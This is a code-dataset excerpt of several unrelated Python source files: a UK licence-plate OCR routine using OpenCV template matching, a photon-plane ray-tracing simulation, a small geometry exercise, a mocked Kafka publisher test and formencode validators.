ch = '.'\r\n else:\r\n if ch in '0123456789': ch = '#'\r\n else:\r\n if ch in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': ch = '@'\r\n else: ch = '?'\r\n creg += ch\r\n return creg\r\n\r\n # see if two strings are the same BUT with dot as a wild-card char\r\n def dotMatch(str1, str2):\r\n if str1 == str2: return True\r\n if len(str1) != len(str2): return False\r\n for i in range(0, len(str1)):\r\n if (str1[i] != '.') and (str2[i] != '.') and (str1[i] != str2[i]): return False\r\n return True\r\n\r\n # Massage 0/O and I/1 characters in supplied reg to match most likely UK format\r\n def massage(reg):\r\n creg = characterise(reg, 1)\r\n if '?' in creg: return reg\r\n if '.' 
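# --- editor's note: hedged illustration, not part of the original file ---
# characterise()/dotMatch() above reduce a reg string to a coarse template
# ('#'=digit, '@'=letter, '.'=ambiguous 0/1/O/I) and compare templates with
# '.' as a wildcard. The same pattern-matching idea in isolation:
def to_template(reg):
    out = ''
    for ch in reg:
        if ch in 'IO01':
            out += '.'                     # glyphs that could be digit or letter
        elif ch.isdigit():
            out += '#'
        elif 'A' <= ch <= 'Z':
            out += '@'
        else:
            out += '?'
    return out

def wildcard_match(a, b):
    return len(a) == len(b) and all(
        x == y or x == '.' or y == '.' for x, y in zip(a, b))

assert to_template('AB12CDE') == '@@.#@@@'
assert wildcard_match(to_template('AB12CDE'), '@@##@@@')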
not in creg: return reg\r\n keys = PlateLUT.keys()\r\n hiscore = -1\r\n hifmt = ''\r\n for fmt in keys:\r\n if dotMatch(creg, fmt):\r\n if PlateLUT[fmt] > hiscore:\r\n hiscore = PlateLUT[fmt]\r\n hifmt = fmt\r\n if hifmt == '': return reg\r\n # do the massage\r\n ro = ''\r\n for i in range(0, len(creg)):\r\n ch = reg[i]\r\n if creg[i] == '.':\r\n if hifmt[i] == '@':\r\n if ch == '0': ch = 'O'\r\n elif ch == '1': ch = 'I'\r\n if hifmt[i] == '#':\r\n if ch == 'O': ch = '0'\r\n elif ch == 'I': ch = '1'\r\n ro += ch\r\n return ro\r\n\r\n # Return plate bounding-box XYWH from regData and initial crop XY info\r\n # Note that the bbox ignores any rotation / de-skew transformations\r\n def bbFromRD(rd,h,w,crop):\r\n X,Y = crop\r\n Xlist = sorted(rd)\r\n X = max(0, X + Xlist[0] - w)\r\n Y = max(0, Y + rd[Xlist[0]][1] - 3*h//4)\r\n W = Xlist[-1] - Xlist[0] + 2*w\r\n H = 3*h//2\r\n return (X,Y,W,H)\r\n\r\n # scan through a dictionary, look for longest index string length\r\n def maxlen(dctn):\r\n mx = 0\r\n for k in dctn: mx = max(mx, len(k))\r\n return mx\r\n\r\n # ------------------ main --------------------\r\n\r\n t0 = time.time()\r\n if DEBUG: print(\">>> start @ {:1.1f}\".format(time.time() - t0))\r\n\r\n PIBY180 = np.pi / 180\r\n CLAHE = cv2.createCLAHE(clipLimit=1, tileGridSize = (8,8)) # invoke a contarst-limited adaptive histogram equaliser\r\n\r\n # Convert input image to gry-scale if necessary, look for a license plate, crop source image.\r\n if len(in_img.shape) > 2:\r\n img = cv2.cvtColor(in_img, cv2.COLOR_BGR2GRAY)\r\n pcol = '' # detect plate colour later\r\n else:\r\n img = in_img\r\n pcol = '-' # plate colour: - => b/w image - can't detect b/g colour\r\n if (not isinstance(plateXYWH, tuple)) or (len(plateXYWH) != 4):\r\n rect = lookForPlate(img, TargetWH) # assumes a gryscale image\r\n else:\r\n rect = plateXYWH\r\n px,py,pw,ph = rect\r\n if pw == 0: return '!No Plate' \r\n rect1 = enlargeCrop(rect) # expand the AOI\r\n th = int(0.5 + ph/PH2TH)\r\n tw = int(0.5 + ASPECT*ph/PH2TH)\r\n imgry = cropIt(img, rect1)\r\n cropXY = (rect1[0], rect1[1])\r\n ih,iw = imgry.shape\r\n if DEBUG: print('Source img cropped to:', ih, 'x', iw)\r\n # Histogram-eq & de-noise\r\n img_gry = CLAHE.apply(imgry)\r\n img_gry = cv2.fastNlMeansDenoising(img_gry, None, 16, 7, 21)\r\n img_gry = CLAHE.apply(img_gry)\r\n # Neg detect, some plates are white-on-black, negate the image if approp\r\n x0,y0,x1,y1 = (iw-pw)//2, (ih-ph)//2,(iw+pw)//2, (ih+ph)//2, # define a smaller AOI\r\n img_t = cv2.adaptiveThreshold(img_gry[y0:y1,x0:x1], 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n if np.mean(img_t) < 128: # neg detection\r\n img_gry = 255 - img_gry\r\n imgry = 255 - imgry\r\n pcol = 'B'\r\n # Adaptive threshold & edge detect ready for hough lines\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n skel = cv2.Canny(img_thr, 100, 200)\r\n if DEBUG: skel0 = skel.copy() # keep a copy of original\r\n\r\n if DEBUG: print(\">>> start horizontalisation @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Horizontalisation...\r\n # Detect rotation...\r\n # 1. using SJM's Haar-Cascade character spotter\r\n chsList, Yav = seekChrs(img_gry, (tw,th))\r\n rfc, xspan = rotFromCas(chsList)\r\n ccnf = min(1, xspan/pw) # confidence range 0 .. 1\r\n # 2. 
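# --- editor's note: hedged illustration, not part of the original file ---
# The thresholding above forces the blockSize odd via th + (1 - th % 2)
# (cv2.adaptiveThreshold rejects even block sizes), and the mean-intensity
# test flips white-on-black plates. Both tricks on their own, assuming a
# grayscale numpy image and th >= 3:
import cv2
import numpy as np

def binarise_plate(gray, th):
    block = th + (1 - th % 2)                  # th rounded up to the next odd value
    binimg = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
                                   cv2.THRESH_BINARY, block, 2)
    if np.mean(binimg) < 128:                  # mostly black => negative plate
        gray = 255 - gray                      # negate, then threshold again
        binimg = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
                                       cv2.THRESH_BINARY, block, 2)
    return gray, binimg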
using Hough lines\r\n rfl, lcnf = rotFromLines(skel)\r\n # combine results\r\n if lcnf + ccnf > 0:\r\n # average results according to relative confidences \r\n degs = ((rfc * ccnf) + (rfl * lcnf)) / (ccnf + lcnf) \r\n if DEBUG: print('Detected rotation: {:0.2f}'.format(degs))\r\n if abs(degs) >= 0.15:\r\n if DEBUG: print('Fixing rotation...')\r\n rmx = cv2.getRotationMatrix2D((iw//2,ih//2),degs,1)\r\n img_gry = cv2.warpAffine(img_gry, rmx, (iw,ih))\r\n imgry = cv2.warpAffine(imgry, rmx, (iw,ih))\r\n # re-make skel fro de-skew\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n skel = cv2.Canny(img_thr, 100, 200)\r\n else:\r\n if DEBUG: print(\"Can't determine rotation\")\r\n\r\n if DEBUG: print(\">>> start de-skew @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # De-skew...\r\n # Find skew angle...\r\n degs, cnf = skewAngle(skel, th)\r\n if cnf > 0:\r\n if DEBUG: print('Detected skew: {:0.2f}'.format(degs))\r\n # -ve result means chars slope backwards\r\n d = ih * math.tan(degs * PIBY180) # deskew amount in pixels\r\n if abs(d) >= .5:\r\n # apply skew correction\r\n if DEBUG: print('Fixing skew...')\r\n xl,xr = int(iw * 0.1), int(ih * 0.9)\r\n pts1 = np.float32([[xl, 0],[xr, 0],[0,ih-1],[iw-1,ih-1]]) # 4 source points\r\n pts2 = np.float32([[xl-d,0],[xr-d,0],[0,ih-1],[iw-1,ih-1]]) # 4 destn points\r\n PT = cv2.getPerspectiveTransform(pts1,pts2)\r\n img_gry = cv2.warpPerspective(img_gry, PT, (iw, ih))\r\n imgry = cv2.warpPerspective(imgry, PT, (iw, ih))\r\n\r\n if DEBUG: print(\">>> start enhance @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # More image enhancements...\r\n img_thr = cv2.adaptiveThreshold(img_gry, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, th + (1 - (th % 2)), 2)\r\n SE = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3)) \r\n img_t2 = cv2.dilate(img_thr, SE)\r\n img_proc = cv2.bitwise_and(img_gry, img_t2)\r\n img_t3 = cv2.erode(img_thr, SE)\r\n img_proc = cv2.bitwise_or(img_proc, img_t3)\r\n img_proc = cv2.blur(img_proc, (3,3))\r\n\r\n if DEBUG: print(\">>> start char height estimation @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Improve estimate of character height...\r\n # Also improve estimate of plate position and size\r\n # Method 1. Identify character bboxes using UKChar haar-cascade classifyer\r\n chsList, Yav = seekChrs(img_gry, (tw,th))\r\n if len(chsList) < 5: # maybe some more processing would help\r\n if DEBUG: print('Found only ',len(chsList),'chars, re-try with thresholding...')\r\n chsListB, YavB = seekChrs(img_proc, (tw,th))\r\n if len(chsListB) > len(chsList):\r\n chsList = chsListB\r\n Yav = YavB\r\n if DEBUG: print('Found', len(chsList), 'UKChars')\r\n # Compute centre-line, char height (and horizontal range for later)\r\n ycl = ih // 2\r\n Hlst = (th, )\r\n xl, xr = int(iw * 0.45), int(iw * 0.55)\r\n if (len(chsList) > 0):\r\n ycl = int(Yav + 0.5)\r\n for n in range(0, len(chsList)):\r\n Hlst += (chsList[n][3] * CAS_OVER, ) # HEIGHT compensated for over-estimation\r\n xl = min(xl, chsList[n][0])\r\n xr = max(xr, chsList[n][0]+chsList[n][2])\r\n if len(chsList) < 2: xl, xr = int(iw * 0.25), int(iw * 0.75)\r\n # Method 2. 
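# --- editor's note: hedged illustration, not part of the original file ---
# The de-skew above shifts the two top corners sideways by d = ih * tan(angle)
# through a 4-point perspective transform. Because only x moves, the warp is
# equivalent to a 2x3 affine shear, sketched here with the same convention:
import math
import cv2
import numpy as np

def deskew(img, degs):
    ih, iw = img.shape[:2]
    d = ih * math.tan(math.radians(degs))      # horizontal drift over the full height
    # x' = x + (d / ih) * y - d: the top row shifts by -d, the bottom row stays put
    M = np.float32([[1, d / ih, -d], [0, 1, 0]])
    return cv2.warpAffine(img, M, (iw, ih))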
Locate & measure text-like blocks using the sobel filter\r\n sox = cv2.Sobel(img_proc, cv2.CV_8U, 1, 0, ksize=1)\r\n _,thx = cv2.threshold(sox, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n SE = cv2.getStructuringElement(cv2.MORPH_RECT, (int(pw/3.5), int(ph/11)))\r\n morf=cv2.morphologyEx(thx, cv2.MORPH_CLOSE, SE)\r\n # measure text height at several mid-ish points along x-axis\r\n ths,ycls = measureTxH(morf, xl, xr)\r\n # Average both methods' data\r\n n = len(chsList)\r\n if (n > 0) and (ycls > 0): ycl = int(0.5 + (((ycl * n) + ycls) / (n + 1)))\r\n elif ycls > 0: ycl = ycls\r\n if (ths > 0): Hlst += (ths, )\r\n if len(Hlst) > 0: th = int(np.average(Hlst) + 0.5)\r\n if th > ih * 0.9: return '!Bad plate - text too big'\r\n if th < 20: return '!Bad plate - text too small'\r\n if DEBUG: print(\"Char height estimate:\", th, \"px\")\r\n if DEBUG: print(\">>> start contrast stretch @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # Contrast-stretch(5%) the whole image using a histogram analysis from\r\n # just the central-th x central-coverage-width known plate area... \r\n # First, create the AOI mask image\r\n mask = np.zeros((ih,iw), dtype=np.uint8)\r\n x1,y1,x2,y2 = xl, int(ycl-(th/2)+1), xr, int(ycl+(th/2)-1)\r\n mask[y1:y2,x1:x2] = 255\r\n # calc the histogram...\r\n hist = cv2.calcHist([cv2.blur(imgry, (3,3))], [0], mask, [256], [0,256]) # get histogram of masked area\r\n newLUT = heq(hist) # equalise it\r\n for x in range(0, iw): # apply\r\n for y in range(0, ih): imgry[y][x] = newLUT[imgry[y][x]]\r\n\r\n # Prepare an image source for the XC stages...\r\n # Blurring helps to reduce the unwelcome image sharpening effects from the camera \r\n img_xc = cv2.blur(imgry, (3,3))\r\n\r\n # re-evaluate plate extents for initial XC AOI\r\n pw = int(PW2CH*th + 0.5)\r\n tw = int(ASPECT*th + 0.5)\r\n xl, xr = tw//2, iw-1-tw//2\r\n # Define initial AOI to height th*2 around ycl and width to xl..xr horiz extents\r\n AOI = [max(0, xl-(tw//2)), max(0, ycl-th), min(iw, xr+(tw//2)), min(ih, ycl+th)] # X1,Y1,X2,Y2\r\n\r\n if DEBUG: print(\">>> start XC stages @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # XC OCR stages with character-size optimisation...\r\n # We template-match to a range of text sizes and shapes to try to find the optimum by\r\n # itteratively adjusting template th and tw for maximum peak-heights in the XC landscape\r\n # This is the real time-consuming stage so we do some tricks to minimise delays.\r\n # Note we exclude the I character here due to its anomalous width, see later\r\n n = max(4, len(chsList)) # the number of chars to pick from the top of the list when evaluating overall match quality\r\n chs = '23456789ABCDEFGHJKLMNOPQRSTUVWXYZ' # Valid UK plate characters w/o I\r\n base_xc, cv, yc, tmph, cxcLst, ppoints, regData = preScan(img_xc, AOI, chs, th, tw, n, pw, 0) # base measure\r\n ycl = int(yc + 0.5)\r\n # Increase speed by scanning a reduced character set and AOI\r\n # The poorer the over-all XC the more chars we scan for & the wider the AOI (& the slower the process)\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph, cv, ycl)\r\n if DEBUG: print('base xc:', base_xc)\r\n if DEBUG: print(chs)\r\n d = 1\r\n tho = th\r\n\r\n if DEBUG: print(\">>> start XC height opt @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # text height optimisation...\r\n while True:\r\n if DEBUG: print(\"H-opt loop\")\r\n xc, cv, yc, tmph, cxcLst, ppoints, rd = preScan(img_xc, AOI, chs, th+d, int(((th+d) * ASPECT) + 
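# --- editor's note: hedged illustration, not part of the original file ---
# The LUT application above visits every pixel in a Python double loop, which
# is very slow on large crops. Assuming newLUT is a 256-entry table, the same
# contrast stretch can be done in one vectorised step:
import numpy as np

def apply_lut(img, lut):
    table = np.asarray(lut, dtype=np.uint8)    # shape (256,)
    return table[img]                          # fancy indexing runs in C
# cv2.LUT(img, table) is an equivalent OpenCV one-liner.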
0.5), n, pw, 0)\r\n regData = regMerge(regData, rd, tw)\r\n if xc <= base_xc:\r\n if d != 1: break\r\n d = -1\r\n continue\r\n if DEBUG: print('Improved th:', d, '=>', xc)\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n if DEBUG: print(chs)\r\n base_xc = xc\r\n ycl = int(yc + 0.5)\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph+d, cv, ycl)\r\n tho = th+d\r\n pw = int(PW2CH * tho + 0.5)\r\n d = nextUD(d)\r\n th = tho\r\n\r\n if DEBUG: print(\">>> start XC width opt @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # now width...\r\n n = min(7, min(3, len(regData)))\r\n tw = int((th * ASPECT) + 0.5) # starting point, based on best th\r\n d = 1\r\n two = tw\r\n while True:\r\n if DEBUG: print(\"W-opt loop\")\r\n xc, cv, yc, tmph, cxcLst, ppoints, rd = preScan(img_xc, AOI, chs, th, tw+d, n, pw, 0)\r\n regData = regMerge(regData, rd, tw)\r\n if xc <= base_xc:\r\n if d != 1: break\r\n d = -1\r\n continue\r\n chs = sorted(cxcLst, key=cxcLst.__getitem__, reverse=True)[0:XC2N(base_xc)]\r\n base_xc = xc\r\n ycl = int(yc + 0.5)\r\n AOI = AOIfromPks(iw, ih, tw, ppoints, base_xc, tmph, cv, ycl)\r\n two = tw+d\r\n pw = int(STW2TW * two) # better approximation to license-string width\r\n d = nextUD(d)\r\n tw = two\r\n\r\n if len(regData) == 0: return '!No reg data'\r\n\r\n if DEBUG: print(\">>> start I stage prep @ {:1.1f}\".format(time.time() - t0))\r\n\r\n pw = int(STW2TW * tw) # better approximation to total character-string width\r\n twI = int(tw * ASPI + 0.5)\r\n\r\n # Reject weak chars on the basis of an over-all quality score\r\n # Assumes forceFit() has previously run to extend the regData dict\r\n while rejectWeaklings(regData, 6.66): pass\r\n\r\n if DEBUG: pprint.pprint(regData)\r\n\r\n if len(regData) == 0: return '!No reg data'\r\n\r\n # re-calc base-xc & ycl on the remaining chars in prep for I stage\r\n base_xc = 0\r\n ycl = 0\r\n for x in regData:\r\n ycl += regData[x][1]\r\n base_xc += regData[x][2]\r\n base_xc /= len(regData)\r\n ycl = int(0.5 + ycl/len(regData))\r\n\r\n # Use a simpler centre-line scan for spotting I chars...\r\n ipoints = IScan(img_xc, ycl, twI, th)\r\n # Augment regData with the new I-spots resolving any conflicts by deleting the weaker char\r\n n = 0\r\n for x,y,xc in ipoints:\r\n if xc < base_xc * 0.6: continue # I xc must be in-line with other xcs\r\n if x in regData:\r\n if xc > regData[x][2]: regData[x] = ['I', y, xc]\r\n continue\r\n (xxl,xxr) = nearestValids(x, regData)\r\n xxcl = xxcr = 0\r\n if xxl is not None:\r\n if regData[xxl][0] == 'I': cw = twI\r\n else: cw = tw\r\n if (x - xxl) <= (2 + cw + twI)/2: xxcl = regData[xxl][2]\r\n if xxr is not None:\r\n if (xxr - x) <= (2 + tw + twI)/2: xxcr = regData[xxr][2]\r\n xxc = max(xxcl, xxcr)\r\n # Conflict: strongest XC wins but we bias the contest against I chars\r\n if math.pow(xc,1.5) < xxc: continue\r\n if xxc > 0:\r\n # new char is stronger, need to delete something.\r\n if (xxcr > 0) and (xxcl > 0):\r\n del(regData[xxl]) # delete the incumbants\r\n del(regData[xxr])\r\n else:\r\n if xxcl > xxcr : xx = xxl\r\n else: xx = xxr\r\n del(regData[xx]) # delete the incumbant\r\n regData[x] = ['I', y, xc]\r\n n += 1\r\n if n > 0:\r\n if DEBUG: pprint.pprint(regData)\r\n # re-run rejection processes on I-extended regData\r\n while delOOBChars(regData, pw, tw, twI): pass\r\n forceFit(regData, 1.33)\r\n while rejectWeaklings(regData, 8): pass\r\n\r\n if DEBUG: print(\">>> start finish-up @ {:1.1f}\".format(time.time() - t0))\r\n\r\n # if necessary reduce to the max allowed char 
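# --- editor's note: hedged illustration, not part of the original file ---
# The I-stage above only lets a new detection displace a nearby incumbent in
# regData when its correlation score wins (with I chars handicapped via
# xc ** 1.5). The arbitration pattern, stripped to its core:
def insert_detection(detections, x, entry, min_gap):
    # detections: dict x -> (char, y, xc); entry: (char, y, xc)
    for xi in list(detections):
        if abs(xi - x) <= min_gap:             # overlapping incumbent found
            if entry[2] <= detections[xi][2]:  # newcomer is weaker: reject it
                return False
            del detections[xi]                 # newcomer is stronger: evict
    detections[x] = entry
    return True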
count...\r\n w = 8.0\r\n mxln = maxlen(PlateLUT)\r\n while len(regData) > mxln:\r\n while not rejectWeaklings(regData, w): w *= 0.95\r\n\r\n regn = ''\r\n for rd in sorted(regData): regn += regData[rd][0]\r\n if regn.replace('I', '') == '': return '!No reg data'\r\n # Match to most likely UK reg format\r\n scr = likelyhoodScore(regn) # -20, 0 ... +20\r\n # compute a composite confidence factor 0..99, part base_xc, part likelyhoodness\r\n cnf = 0\r\n if scr < 0:\r\n # NOT a valid format!\r\n # If the error can be narrowed down to a single char then\r\n # a commonly mis-read alpha/num assoc could be swapped out:\r\n # ie: 8 <=> B, 5 <=> S, D => 0, Q => 0, 7 <=> Z, 6 <=> G\r\n # if so return a reduced conf < 80\r\n # Else Return a cnf of zero to indicate a non-confoming format\r\n # &&& Perhaps also challenge leading / trailing I chars\r\n alt = swapBadCh(regn)\r\n if alt != '':\r\n regn = alt\r\n cnf = int((base_xc * 0.8) * 100) # reduced conf\r\n else: cnf = int((base_xc * 0.9 + scr * 0.004) * 100 + 0.5) # composite conf\r\n regn = massage(regn) # optimise 0/O, I/1 choices \r\n\r\n # calc plate bbox relative to source image\r\n bbox = bbFromRD(regData, th, tw, cropXY) # XYWH\r\n\r\n # get plate b/g colour if possible...\r\n if len(pcol) == 0:\r\n # we have a colour source image, and it's not a wht-on-blk plate\r\n pcol = WhtOrYel(in_img, bbox) # returns Y or W or '-' if unsure\r\n # else pcol is already either '-' for unknowable or 'B' for black\r\n\r\n if DEBUG: print(\">>> end @ {:1.1f}\".format(time.time() - t0))\r\n\r\n return regn, cnf, bbox, pcol\r\n\r\n# ----------------- demo mode? Accept an image file name -------------------\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n if len(sys.argv) > 1:\r\n img = cv2.imread(sys.argv[1])\r\n DEBUG = True\r\n print(ReadPlate(img, (170,50)))\r\n else: print('Please provide an image file name, UKRegOCR will try to find and read a UK number-plate') \r\n\r\n","repo_name":"Finitech-SDP/vision","sub_path":"licence_plate_recognition/UK_Plate/UKRegOCR.py","file_name":"UKRegOCR.py","file_ext":"py","file_size_in_byte":47414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43290375260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 24 11:04:37 2021\n\n@author: astap\n\"\"\"\ntimestep = 1e-11;\nc = 3e8\n\n\nimport numpy as np\n\nimport jitSpeedup as speedUp\nfrom numba import jit\nfrom scenarioVariables import xLim, yLim, zLim, c, timestep\n\nisInLim = lambda D1Limits, D1Position: D1Limits[0] 1/np.sqrt(2)):\n xiHat = orthoProjection(iHat, zetaHat)\n else:\n xiHat = orthoProjection(jHat, zetaHat)\n xiHat /= norm(xiHat)\n etaHat = crossProd(zetaHat, xiHat)\n return np.array((zetaHat, xiHat, etaHat))\n\n\ndef unitSphericalDistribution():\n latDist = np.random.random()*2 - 1\n sgn = np.sign(latDist); latDist *= sgn\n latitude = np.pi*(np.sqrt(latDist)/2 if sgn>0 else 1-np.sqrt(latDist)/2)\n longitude = 2*np.pi*np.random.random()\n x,y,z = np.sin(latitude)*np.cos(longitude), np.sin(latitude)*np.sin(longitude), np.cos(latitude)\n return x,y,z\n\nclass plane:\n def __init__(self, location, direction):\n self.zeta, self.xi, self.eta = generateUnitBasis(direction)\n self.location = location\n self.markings = []\n #skaper en basis (xi, eta, zeta) for planet med 'direction'(=zeta) som enhetsvektor\n #i retning av planets normal-akse. 
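# --- editor's note: hedged illustration, not part of the original file ---
# generateUnitBasis() above builds an orthonormal frame (zeta, xi, eta) from a
# single direction: project a coordinate axis off zeta (one Gram-Schmidt
# step), then complete the frame with a cross product. A compact numpy
# equivalent for reference:
import numpy as np

def frame_from_normal(n):
    z = n / np.linalg.norm(n)
    seed = np.array([0.0, 0.0, 1.0]) if abs(z[2]) < 0.9 else np.array([1.0, 0.0, 0.0])
    x = seed - np.dot(seed, z) * z             # remove the component along z
    x /= np.linalg.norm(x)
    y = np.cross(z, x)                         # completes a right-handed basis
    return z, x, y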
Planet defineres\n #til å krysse location, og baserer sine koordinater ut fra dette\n\n\n def __le__(self, photon):\n relativeLocationInitial = photon.location - self.location\n zetaCoordinateInitial = dotProd(relativeLocationInitial, self.zeta)\n relativeLocationFinal = photon.nextStep() - self.location\n zetaCoordinateFinal = dotProd(relativeLocationFinal, self.zeta)\n return np.sign(zetaCoordinateFinal) != np.sign(zetaCoordinateInitial)\n #Returnerer sann dersom fortegnet til zeta-koordinatet endres\n #etter ett timestep. Nå vil 'plan <= foton' returnere sann\n #dersom fotonet krysser planet i løpet av neste timestep\n\n def __lt__(self, photon):\n if not (self <= photon): #Sjekker om det skjer skæring mellom plan og foton\n return False #Dersom ingen skjæring: Returner false\n relativeLocationInitial = photon.location - self.location\n planePhotonDistance = dotProd(relativeLocationInitial, self.zeta)\n requiredTravelDistance = planePhotonDistance/dotProd(photon.direction, self.zeta)\n inPlanePosition = photon.nextStep(distance=requiredTravelDistance);\n relativeLocationFinal = inPlanePosition - self.location\n self.markings.append(np.array((dotProd(relativeLocationFinal, self.xi), dotProd(relativeLocationFinal, self.eta))))\n return True\n\n\n\nclass photon:\n planes = []; #Alle aktuelle plan hvilket fotonet kan krysse\n\n def __init__(self, location, direction):\n self.location = location\n self.direction = normalize(direction)\n\n def nextStep(self, distance=c*timestep):\n return self.location + self.direction * distance\n\n def jitPrimer(self):\n planesCoordinates = [plane.location for plane in photon.planes]\n planesDirections = [plane.zeta for plane in photon.planes]\n initialCoordinates = self.location\n initialDirection = self.direction\n hitPlane, position = speedUp.jitTilHit(planesCoordinates, planesDirections,\n initialCoordinates, initialDirection)\n\n if not hitPlane:\n del self\n return position\n self.location = position\n\n\n for plane in photon.planes:\n if(plane < self):\n del self\n return position\n\n raise Exception(\"Disagreement of hit between jit-nopython and python\")\n\n\n\n\npl = plane(np.array((0.7,0.0,0.0)), normalize(np.array((-1.0,-1.0,0.0))))\nphoton.planes.append(pl)\n\nposes = []\nfor j in range(4):\n for i in range(1000):\n dir = unitSphericalDistribution()\n pos = np.array((-.9,-.9,.0))\n ph = photon(pos.copy(), dir)\n current_poses = [pos, ph.jitPrimer()]\n poses.append(np.array(current_poses))\n print(\"*\", end='')\n\nposes = poses[::4]\n\n\n\n\n\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure(0)\nax = fig.add_subplot(111,projection='3d')\nfor path in poses:\n ax.plot(*path.T, ':', c=\"k\")\n\nscatterpos = []\nfor mrk in pl.markings:\n pos = pl.location + pl.xi*mrk[0] + pl.eta*mrk[1]\n scatterpos.append(pos)\nscatterpos = np.array(scatterpos)\nax.scatter(*scatterpos.T,c='r',marker='x')\nplt.show()\nfig.savefig(\"illustrasjon.pdf\")\n\nfig2 = plt.figure(1)\nplt.plot(*np.array(pl.markings).T, 'rx')\n\nplt.show()","repo_name":"Gardcs/VitBerBIO","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"388977577","text":"def is_inside(list_1, list_2):\n if list_2[0] <= list_1[0] <= list_2[0] + list_2[2] and list_2[1] <= list_1[1] <= list_2[1] + list_2[3]:\n return True\n else:\n return False\n\n\ncheck = is_inside([250, 270], [140, 60, 100, 200])\nif check == 
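# --- editor's note: hedged illustration, not part of the original file ---
# plane.__lt__ above locates the crossing point by scaling the photon's
# direction with (signed plane distance) / (direction . normal). The core
# ray-plane intersection on its own:
import numpy as np

def ray_plane_hit(origin, direction, p0, normal):
    denom = np.dot(direction, normal)
    if abs(denom) < 1e-12:                     # ray parallel to the plane
        return None
    t = np.dot(p0 - origin, normal) / denom    # travel distance along the ray
    return origin + t * direction if t >= 0 else None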
False:\n print('Your function is correct')\nelse:\n print('Oops, bugs detected')\n","repo_name":"nganjjang/nguyenhangan-labs-c4e17","sub_path":"Lab3/homework/hw_lab3_ex12.py","file_name":"hw_lab3_ex12.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5927738685","text":"from publisher import Publisher, PublisherConfig\nimport json\nimport logging\nimport unittest\nfrom unittest.mock import MagicMock, Mock, patch\n\n\nclass MockedPublisher(Publisher):\n def __init__(self, config, topic):\n super().__init__(config, topic)\n self.publisher = MagicMock()\n\n\ndef test_send_message():\n publisher_config = PublisherConfig(admin=True)\n publisher = MockedPublisher(publisher_config, \"test_topic\")\n\n publisher.producer.send = MagicMock()\n publisher.logger.info = MagicMock()\n publisher.logger.error = MagicMock()\n\n mock_message = {\"msg\": \"Test message 1\"}\n\n with patch(\"logging.info\") as mock_logging_info, patch(\n \"logging.error\"\n ) as mock_logging_error:\n publisher.send_message(mock_message)\n\n # Pass the correct arguments to the `assert_called_once_with` method\n encoded_message = json.dumps(mock_message).encode(\"utf-8\")\n publisher.producer.send.assert_called_once_with(\n publisher.TOPIC_NAME, encoded_message\n )\n\n assert publisher.logger.info.call_count == 1\n","repo_name":"chrisguest75/python_examples","sub_path":"08_kafka/tests/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71234410349","text":"import formencode\nimport tw2.core as twc\nfrom formencode import validators\n\n__all__ = [\"NotExistance\", \"ExistByPrimaryKey\"]\n\n\nclass NotExistance(validators.FancyValidator):\n\tmessages = {\n\t\t\"already_exists\": \"Such type already exists\"\n\t}\n\n\tdef __init__(self, modelType, *args):\n\t\tself.modelType = modelType\n\t\tself.fields = args\n\n\tdef _validate_python(self, value, state=None):\n\t\tprint('value =', value)\n\t\tif twc.Invalid in value.values():\n\t\t\treturn value\n\t\tcryteria = dict([(i, value[i]) for i in self.fields])\n\t\tprint(cryteria)\n\t\tif self.modelType.checkIsExists(**cryteria):\n\t\t\traise formencode.Invalid(\n\t\t\t\tself.message(\"already_exists\", state),\n\t\t\t\tvalue, state)\n\t\treturn value\n\n\nclass ExistByPrimaryKey(validators.FancyValidator):\n\tmessages = {\n\t\t\"not_exists\": \"Object with given key not exists\"\n\t}\n\n\tdef __init__(self, modelType):\n\t\tself.modelType = modelType\n\n\tdef _validate_python(self, value, state=None):\n\t\tprint('value =', value)\n\t\tif not self.modelType.getById(value):\n\t\t\traise formencode.Invalid(\n\t\t\t\tself.message(\"not_exists\", state),\n\t\t\t\tvalue, state)\n\t\treturn value\n","repo_name":"keksovmen/NARFU_Arhitecture","sub_path":"PZ5/pz5/forms/CustomValidators.py","file_name":"CustomValidators.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36902155256","text":"from 